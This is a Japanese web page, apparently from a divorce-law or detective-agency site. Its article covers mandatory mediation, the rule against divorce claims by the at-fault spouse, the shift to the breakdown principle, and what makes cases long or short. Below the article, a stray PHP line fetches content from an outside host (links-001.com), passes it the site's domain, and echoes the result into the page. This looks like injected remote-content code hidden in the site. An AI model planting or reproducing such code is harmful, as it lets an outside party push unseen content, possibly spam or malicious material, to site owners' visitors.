前へ
次へ

離婚裁判に向けて相談を

結婚した時は一生仲良くしているつもりでも、様々な要因でうまくいかなくなることがあります。頑張ってみる

more

メールなどのやり取り記録が離婚裁判の証拠か

電話と言えば携帯電話を利用することが多くなりましたが、メールに関してはパソコンで行うか携帯電話で行う

more

離婚裁判に探偵社の調査報告書が有効な理由

探偵の仕事と言えば誰でもいつからでも始められるように感じますが、実際は一定の資格が必要になります。国

more

離婚裁判における法律の考え方の変遷

結婚の時はまったく考えていなくても離婚に至ることは往々にしてあります。離婚をするときには、相手との話し合いによって離婚する協議離婚が大半です。しかし、話し合いがうまくいかず、また家庭裁判所による調停離婚も成立しなかった場合は、最終的に離婚裁判しかありません。裁判であることに変わりはありませんので、夫婦間で争いがあることになります。この争いには、離婚することそのもの、財産分与や年金分割、慰謝料、子どもの親権や養育費、離婚後の子どもとの面会等が例としてあげられます。日本における離婚裁判においては、まず調停が行われなければなりません。いきなり訴訟を提起するのではなく、まずは家庭裁判所に間に入ってもらって話し合いを行います。その話し合いがうまくいかなければ、裁判になります。この離婚裁判においては、有責配偶者からの離婚請求は認めないという原則があります。例えば、不倫をした側からは離婚を主張できないという原則です。厳密には、離婚訴訟を起こすことはできますが、相手が離婚に応じなかった場合は離婚請求が棄却されます。この原則については、現在は破綻主義の考え方が撮られています。これは、夫婦関係が実質的に破綻しているのであれば、有責配偶者からの請求であっても離婚を認める場合があるという考え方に転換しています。一般的に裁判の迅速化が図られていますが、離婚裁判ににおおいても、早く終わる場合と長期化する場合があります。これは、争いの論点や内容によって影響されます。争点がなければ、離婚するかしないかだけの問題になりますので、結審も早く、判決も早く出ます。また、訴訟の途中で、当事者が話し合いによって和解し、裁判を継続するよりも早くに終結します。一方、争点が多かったり対立に根深いモノがあると訴訟は長引きます。財産分与の割合、不倫の有無、子どもの親権など複数の複雑な論点があると、それを整理して双方の主張と立証が必要ですので、時間と労力を要します。裁判を有利に運ぶためには事前に証拠や記録をそろえておくことが肝要です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top